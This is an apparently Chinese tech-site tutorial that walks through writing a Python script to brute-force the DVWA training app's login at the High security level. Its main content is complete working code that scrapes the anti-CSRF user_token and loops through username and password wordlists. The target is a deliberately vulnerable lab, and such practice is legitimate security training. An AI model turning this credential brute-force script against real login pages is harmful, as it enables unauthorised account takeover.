当前位置：移动技术网 > IT编程>脚本编程>Python > 编写DVWA暴力破解High级别的Python脚本

编写DVWA暴力破解High级别的Python脚本

2019年04月14日 | 移动技术网IT编程 | 我要评论

2010南京悠悠校花门,依靠歌词,修龙阶

1. 过程（不查看源代码）

使用burpsuite或者owasp zap抓取数据包，可以看出页面执行过程如下：

首先获取上一次请求的token，然后sleep几秒，最后使用get方法提交验证。

2. 原理

访问暴力破解的页面，获取token；

带入参数再次访问该页面进行破解。

3. 仿照

搜索类似代码，编写暴力破解的代码。

4. 模拟登录

在最初访问该页面时，实际访问的页面是dvwa的login.php。

需要在访问页面时设置header的cookie。

r = requests.get(url, headers=headers)

5. 查找token

可以使用re（正则表达式）查找。

也可以使用beautifulsoup查找。

由于响应页面的user_token没有id，所以不能使用id进行查找。

可以看到，user_token是第4个input，因此可以通过查找input，获取token的值。

url = "http://%s/dvwa/vulnerabilities/brute/" % ip
r = requests.get(url, headers=headers)
soup = beautifulsoup(r.text, "html.parser")
token = soup.find_all("input")[3].get("value")

6. 完整代码

# -*- coding: utf-8 -*-
# author = 'k0ctr'
 
 
import requests
# import re
from bs4 import beautifulsoup
 
 
ip = "192.168.203.128"
headers = {
    # "user-agent": "mozilla/5.0 (windows nt 10.0; win64; x64; rv:65.0) gecko/20100101 firefox/65.0",
    "cookie": "security=high; phpsessid=5qa8beu11tlu6s79pfdv2jluk7"
}
 
 
with open("small.txt", 'r', encoding="utf-8") as names:
    for username in names:
        with open("common_pass.txt", 'r', encoding='utf-8') as passwords:
            for password in passwords:
                url = "http://%s/dvwa/vulnerabilities/brute/" % ip
                r = requests.get(url, headers=headers)
                soup = beautifulsoup(r.text, "html.parser")
                token = soup.find_all("input")[3].get("value")
                # token = re.findall(r"(?<=<input type='hidden' name='user_token' value=').+?(?=' />)", r.text)[0]
                get_data = {
                    "user_token": token,
                    "username": username.strip(),
                    "password": password.strip(),
                    "login": "login"
                }
                print('-' * 20)
                print('用户名：', username.strip())
                print('密码：', password.strip())
                r = requests.get(url, params=get_data, headers=headers)
                if 'username and/or password incorrect.' in r.text:
                    print('破解失败')
                else:
                    print('破解成功')
                print('-' * 20)

您可能感兴趣的文章:

如对本文有疑问，请在下面进行留言讨论，广大热心网友会与你互动！！点击进行留言回复

python dict乱码如何解决

定义字典并直接输出，结果输出结果中文是乱码展示d={'name':'lily','age':18,'sex':'女','no':1121}print d输出结果... [阅读全文]
如何写python的配置文件

一、创建配置文件在d盘建立一个配置文件，名字为：test.ini内容如下：[baseconf]host=127.0.0.1port=3306user=rootp... [阅读全文]
使用Python FastAPI构建Web服务的实现

fastapi 是一个使用 python 编写的 web 框架，还应用了 python asyncio 库中最新的优化。本文将会介绍如何搭建基于容器的开发环境，... [阅读全文]
Python过滤掉numpy.array中非nan数据实例

代码需要先导入pandasarr的数据类型为一维的np.arrayimport pandas as pdarr[~pd.isnull(arr)]补充知识：pyt... [阅读全文]
python求numpy中array按列非零元素的平均值案例

输入：numpy的array输出：一个一维的平均值arrayimport numpy as np def non_zero_mean(np_arr): exis... [阅读全文]
Python如何向SQLServer存储二进制图片

需求是需要用python往 sqlserver中的image类型字段中插入二进制图片核心代码，研究好几个小时的代码：安装pywin32，adodbapiimag... [阅读全文]
python numpy实现rolling滚动案例

相比较pandas，numpy并没有很直接的rolling方法，但是numpy 有一个技巧可以让numpy在c代码内部执行这种循环。这是通过添加一个与窗口大小相... [阅读全文]
python opencv 实现读取、显示、写入图像的方法

opencv是一个强大的图像处理和计算机视觉库，实现了很多实用算法，值得学习和深究下。opencv包安装·　　这里直接安装opencv-python包（非官方）... [阅读全文]
python thrift 实现单端口多服务的过程

thrift 是一种接口描述语言和二进制通信协议。以前也没接触过，最近有个项目需要建立自动化测试，这个项目之间的微服务都是通过 thrift 进行通信的，然后写... [阅读全文]
Python while true实现爬虫定时任务

记得以前的windows 任务定时是可以的正常使用的，今天试了下，发现不能正常使用了，任务计划总是挂起。接下来记录下python 爬虫定时任务的几种解决方法。今... [阅读全文]

网友评论


验证码：

编写DVWA暴力破解High级别的Python脚本

2019年04月14日 | 移动技术网IT编程 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论